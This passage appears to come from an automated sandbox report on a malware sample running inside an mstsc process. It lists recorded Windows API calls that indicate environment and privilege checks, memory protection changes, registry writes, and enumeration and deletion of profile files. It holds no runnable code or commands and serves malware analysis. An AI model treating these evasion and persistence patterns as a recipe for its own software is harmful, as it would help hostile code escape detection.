      • Part of subcall function 0006E6ED: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,00061A31), ref: 0006E6FD
      • Part of subcall function 0006E6ED: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E703
      • Part of subcall function 0006E6ED: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006E70E
      • Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00061A31), ref: 0006E72D
      • Part of subcall function 0006E6ED: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00061A31,?,?,?,?,?,KCBqiNhR7x), ref: 0006E736
      • Part of subcall function 0006E6ED: GetComputerNameW.KERNEL32(00000000,?), ref: 0006E751
      • Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0006E78C
      • Part of subcall function 0006E6ED: HeapAlloc.KERNEL32(00000000), ref: 0006E78F
      • Part of subcall function 0006E6ED: GetClipboardOwner.USER32 ref: 0006E79C
      • Part of subcall function 0006E6ED: lstrcpyW.KERNEL32(00000000), ref: 0006E7CF
      • Part of subcall function 0006E6ED: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E7DE
      • Part of subcall function 0006E6ED: HeapFree.KERNEL32(00000000), ref: 0006E7E1
      • Part of subcall function 0006E6ED: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0006E80F
      • Part of subcall function 0006E6ED: CheckTokenMembership.ADVAPI32(00000000,?,00061A31), ref: 0006E82A
      • Part of subcall function 0006E6ED: FreeSid.ADVAPI32(?), ref: 0006E836
      • Part of subcall function 0006E6ED: CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00061A31), ref: 0006E866
      • Part of subcall function 0006E6ED: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0006E87C
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,00106D80), ref: 00064237
      • Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006423A
      • Part of subcall function 000641E5: GetShellWindow.USER32 ref: 00064255
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 000642AC
      • Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 000642AF
      • Part of subcall function 000641E5: GetDoubleClickTime.USER32 ref: 000642CD
      • Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 000642F7
      • Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 000642FE
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00064376
      • Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 00064379
      • Part of subcall function 000641E5: GetDialogBaseUnits.USER32 ref: 00064390
      • Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 000643BA
      • Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 000643C1
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00064419
      • Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006441C
      • Part of subcall function 000641E5: CloseClipboard.USER32 ref: 00064433
      • Part of subcall function 000641E5: LoadLibraryA.KERNEL32(?), ref: 0006445D
      • Part of subcall function 000641E5: GetProcAddress.KERNEL32(00000000), ref: 00064464
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000008,00061A39), ref: 00064487
      • Part of subcall function 000641E5: HeapAlloc.KERNEL32(00000000), ref: 0006448A
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000005), ref: 000644C8
      • Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644CB
      • Part of subcall function 000641E5: CloseHandle.KERNEL32(?), ref: 000644D4
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644DD
      • Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644E0
      • Part of subcall function 000641E5: CloseHandle.KERNEL32(?), ref: 000644EC
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644F5
      • Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 000644F8
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064504
      • Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 0006450D
      • Part of subcall function 000641E5: GetProcessHeap.KERNEL32(00000000,?), ref: 00064512
      • Part of subcall function 000641E5: HeapFree.KERNEL32(00000000), ref: 00064515
      • Part of subcall function 0006BF00: GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF97
      • Part of subcall function 0006BF00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,00106D80), ref: 0006BF9A
      • Part of subcall function 0006BF00: GetFocus.USER32 ref: 0006BFAB
      • Part of subcall function 0006BF00: lstrcatW.KERNEL32(00000000), ref: 0006BFDE
      • Part of subcall function 0006BF00: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C012
      • Part of subcall function 0006BF00: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,00106D80), ref: 0006C042
      • Part of subcall function 0006BF00: HeapFree.KERNEL32(00000000), ref: 0006C045
    • VirtualProtect.KERNEL32(00072000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A85
    • VirtualProtect.KERNEL32(00072000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061A9F
      • Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000008,0000004D,00072000,7142434B,00106D80), ref: 0006FD46
      • Part of subcall function 0006FCD2: HeapAlloc.KERNEL32(00000000), ref: 0006FD49
      • Part of subcall function 0006FCD2: GetDialogBaseUnits.USER32 ref: 0006FD64
      • Part of subcall function 0006FCD2: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0006FD98
      • Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006FDFD
      • Part of subcall function 0006FCD2: HeapAlloc.KERNEL32(00000000), ref: 0006FE00
      • Part of subcall function 0006FCD2: CloseClipboard.USER32 ref: 0006FE14
      • Part of subcall function 0006FCD2: RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0006FE47
      • Part of subcall function 0006FCD2: RegCloseKey.ADVAPI32(00000000), ref: 0006FE50
      • Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE5F
      • Part of subcall function 0006FCD2: HeapFree.KERNEL32(00000000), ref: 0006FE62
      • Part of subcall function 0006FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006FE6E
      • Part of subcall function 0006FCD2: HeapFree.KERNEL32(00000000), ref: 0006FE71
    • GlobalAddAtomW.KERNEL32 ref: 00061ABF
    • AddAtomW.KERNEL32 ref: 00061ACB
      • Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
      • Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
      • Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
      • Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
      • Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
      • Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA
      • Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
      • Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 000616C4
      • Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000616C7
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,0000009D), ref: 000617AA
      • Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000617AD
      • Part of subcall function 000616A9: GetActiveWindow.USER32 ref: 000617C1
      • Part of subcall function 000616A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 000617F0
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000039), ref: 00061836
      • Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 0006183D
      • Part of subcall function 000616A9: GetCaretBlinkTime.USER32 ref: 00061854
      • Part of subcall function 000616A9: StrStrIW.SHLWAPI(?,00000000), ref: 0006187E
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000008,00000051), ref: 000618ED
      • Part of subcall function 000616A9: HeapAlloc.KERNEL32(00000000), ref: 000618F4
      • Part of subcall function 000616A9: GetModuleHandleW.KERNEL32(00000000), ref: 0006190A
      • Part of subcall function 000616A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00061939
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061942
      • Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 00061949
      • Part of subcall function 000616A9: StrCatW.SHLWAPI(?), ref: 0006195C
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0006199E
      • Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619A1
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000619AA
      • Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619B3
      • Part of subcall function 000616A9: GetProcessHeap.KERNEL32(00000000,?), ref: 000619B8
      • Part of subcall function 000616A9: HeapFree.KERNEL32(00000000), ref: 000619BB
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0006F467), ref: 00061AFB
    • HeapFree.KERNEL32(00000000), ref: 00061B02
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006C0CB
      • Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C0CE
      • Part of subcall function 0006C055: IsSystemResumeAutomatic.KERNEL32 ref: 0006C0FA
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C162
      • Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C165
      • Part of subcall function 0006C055: GetClipboardSequenceNumber.USER32 ref: 0006C18A
      • Part of subcall function 0006C055: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006C1C0
      • Part of subcall function 0006C055: GetProcAddress.KERNEL32(00000000), ref: 0006C1C7
      • Part of subcall function 0006C055: GlobalMemoryStatusEx.KERNELBASE(?), ref: 0006C1E2
      • Part of subcall function 0006C055: GetSystemInfo.KERNEL32(?), ref: 0006C1F8
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0006C30F
      • Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C312
      • Part of subcall function 0006C055: GetDesktopWindow.USER32 ref: 0006C32E
      • Part of subcall function 0006C055: RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0006C365
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000051), ref: 0006C3E0
      • Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C3E7
      • Part of subcall function 0006C055: GetClipboardViewer.USER32 ref: 0006C403
      • Part of subcall function 0006C055: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0006C448
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006C4A1
      • Part of subcall function 0006C055: HeapAlloc.KERNEL32(00000000), ref: 0006C4A8
      • Part of subcall function 0006C055: CountClipboardFormats.USER32 ref: 0006C4C0
      • Part of subcall function 0006C055: StrStrIW.SHLWAPI(?,00000000), ref: 0006C4F8
      • Part of subcall function 0006C055: Sleep.KERNEL32(00002710), ref: 0006C505
      • Part of subcall function 0006C055: StrStrIW.SHLWAPI(?,00000000), ref: 0006C514
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C51C
      • Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C529
      • Part of subcall function 0006C055: RegCloseKey.ADVAPI32(?), ref: 0006C536
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C540
      • Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C547
      • Part of subcall function 0006C055: Sleep.KERNELBASE(00002710), ref: 0006C56E
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C59A
      • Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C59D
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5A3
      • Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C5A6
      • Part of subcall function 0006C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0006C5B2
      • Part of subcall function 0006C055: HeapFree.KERNEL32(00000000), ref: 0006C5B5
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,00106D80), ref: 0006A9CF
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006A9D2
      • Part of subcall function 0006A98B: GetCapture.USER32 ref: 0006A9F3
      • Part of subcall function 0006A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0006AA19
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006AA54
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AA57
      • Part of subcall function 0006A98B: GetOpenClipboardWindow.USER32 ref: 0006AA75
      • Part of subcall function 0006A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0006AA9B
      • Part of subcall function 0006A98B: GetUserNameA.ADVAPI32(0007CDF0,?), ref: 0006AAC6
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006AAF9
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AAFC
      • Part of subcall function 0006A98B: GetClipboardViewer.USER32 ref: 0006AB16
      • Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006AB41
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AB78
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AB7B
      • Part of subcall function 0006A98B: GetFocus.USER32 ref: 0006AB95
      • Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006ABC1
      • Part of subcall function 0006A98B: GetComputerNameA.KERNEL32(0007CDF0,00000400), ref: 0006ABE8
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AC16
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AC19
      • Part of subcall function 0006A98B: GetCursor.USER32 ref: 0006AC30
      • Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006AC5B
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006AC8D
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AC90
      • Part of subcall function 0006A98B: GetMenuCheckMarkDimensions.USER32 ref: 0006ACA7
      • Part of subcall function 0006A98B: lstrcmpA.KERNEL32(0007CDF0,00000000), ref: 0006ACD2
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006AD36
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AD39
      • Part of subcall function 0006A98B: GetMessageExtraInfo.USER32 ref: 0006AD53
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006ADB1
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006ADB4
      • Part of subcall function 0006A98B: GetClipboardOwner.USER32 ref: 0006ADCE
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AE2F
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AE32
      • Part of subcall function 0006A98B: GetLastError.KERNEL32 ref: 0006AE4F
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000007), ref: 0006AE98
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AE9B
      • Part of subcall function 0006A98B: CountClipboardFormats.USER32 ref: 0006AEB8
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AEFE
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AF01
      • Part of subcall function 0006A98B: GetFocus.USER32 ref: 0006AF1E
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AF69
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AF6C
      • Part of subcall function 0006A98B: GetMessageExtraInfo.USER32 ref: 0006AF89
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006AFD4
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006AFD7
      • Part of subcall function 0006A98B: GetForegroundWindow.USER32 ref: 0006AFF4
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0006B052
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B055
      • Part of subcall function 0006A98B: GetProcessWindowStation.USER32 ref: 0006B072
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000008), ref: 0006B0BD
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B0C0
      • Part of subcall function 0006A98B: GetModuleHandleW.KERNEL32(00000000), ref: 0006B0DC
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0006B125
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B128
      • Part of subcall function 0006A98B: GetCapture.USER32 ref: 0006B13F
      • Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B1CD
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0006B213
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B216
      • Part of subcall function 0006A98B: IsSystemResumeAutomatic.KERNEL32 ref: 0006B22D
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0006B29D
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B2A0
      • Part of subcall function 0006A98B: GetCurrentThreadId.KERNEL32 ref: 0006B2B7
      • Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B2E2
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0006B363
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B366
      • Part of subcall function 0006A98B: GetClipboardSequenceNumber.USER32 ref: 0006B380
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B40D
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B410
      • Part of subcall function 0006A98B: ReleaseCapture.USER32 ref: 0006B427
      • Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B452
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B4B4
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B4B7
      • Part of subcall function 0006A98B: GetProcessWindowStation.USER32 ref: 0006B4CE
      • Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B4F9
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006B552
      • Part of subcall function 0006A98B: HeapAlloc.KERNEL32(00000000), ref: 0006B555
      • Part of subcall function 0006A98B: GetMenuCheckMarkDimensions.USER32 ref: 0006B569
      • Part of subcall function 0006A98B: StrStrA.SHLWAPI(0007CDF0,00000000), ref: 0006B594
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006B5AF
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5B8
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,00000005), ref: 0006B5BD
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5C0
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0006B5C7
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5CA
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B5D4
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5D7
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,39635538), ref: 0006B5DE
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5E1
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0006B5E8
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5EB
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0006B5F2
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B5F5
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B5FF
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B602
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B60C
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B60F
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B619
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B61C
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B626
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B629
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B633
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B636
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B640
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B643
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B64D
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B650
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B657
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B65A
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B664
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B667
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0006B66E
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B671
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0006B678
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B67B
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0006B682
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B685
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B68F
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B692
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,77584575), ref: 0006B699
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B69C
      • Part of subcall function 0006A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0006B6A6
      • Part of subcall function 0006A98B: HeapFree.KERNEL32(00000000), ref: 0006B6A9
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 00061CC1
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00061CE1
    • GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00061CF8
      • Part of subcall function 00061C18: GetProcAddress.KERNEL32(00000000,?,00060000,00000000,00000000,?,00061D0B,00000000,00000000,?), ref: 00061C65
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

    Non-executed Functions

    APIs
    • GetProfilesDirectoryW.USERENV(00000000,?), ref: 0006230B
    • GetProcessHeap.KERNEL32(00000008,?), ref: 00062329
    • HeapAlloc.KERNEL32(00000000), ref: 0006232C
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0006233F
    • HeapAlloc.KERNEL32(00000000), ref: 00062342
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006235A
    • HeapAlloc.KERNEL32(00000000), ref: 0006235D
    • GetProfilesDirectoryW.USERENV(?,?), ref: 000623A2
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 000623E7
    • HeapAlloc.KERNEL32(00000000), ref: 000623EA
    • GetOpenClipboardWindow.USER32 ref: 0006240A
    • FindFirstFileW.KERNEL32(?,?), ref: 00062470
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 000624BE
    • HeapAlloc.KERNEL32(00000000), ref: 000624C1
    • GetCommandLineA.KERNEL32 ref: 000624DD
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006250C
    • HeapAlloc.KERNEL32(00000000), ref: 0006250F
    • GetForegroundWindow.USER32 ref: 0006252B
    • lstrcmpW.KERNEL32(?,?), ref: 00062560
    • lstrcmpW.KERNEL32(?,00000000), ref: 0006257C
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 000625F4
    • HeapAlloc.KERNEL32(00000000), ref: 000625F7
    • GetCurrentProcessId.KERNEL32 ref: 00062610
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 000626C7
    • HeapAlloc.KERNEL32(00000000), ref: 000626CA
    • GetCurrentProcessId.KERNEL32 ref: 000626E9
    • GetProcessHeap.KERNEL32(00000008,00000061), ref: 00062788
    • HeapAlloc.KERNEL32(00000000), ref: 0006278B
    • GetMenuCheckMarkDimensions.USER32 ref: 000627A4
    • wsprintfW.USER32 ref: 000627E3
    • GetFileAttributesW.KERNEL32(?), ref: 000627ED
      • Part of subcall function 0006E0AE: DeleteFileW.KERNEL32(?,?,00000000,76E6FE8D,00062806), ref: 0006E0C2
      • Part of subcall function 0006E0AE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E0DC
      • Part of subcall function 0006E0AE: HeapFree.KERNEL32(00000000), ref: 0006E0E3
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062814
    • HeapFree.KERNEL32(00000000), ref: 0006281D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062839
    • HeapFree.KERNEL32(00000000), ref: 0006283C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062844
    • HeapFree.KERNEL32(00000000), ref: 00062847
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062859
    • HeapFree.KERNEL32(00000000), ref: 0006285C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062866
    • HeapFree.KERNEL32(00000000), ref: 00062869
    • FindNextFileW.KERNEL32(?,?), ref: 00062879
    • FindClose.KERNEL32(00000000), ref: 0006288B
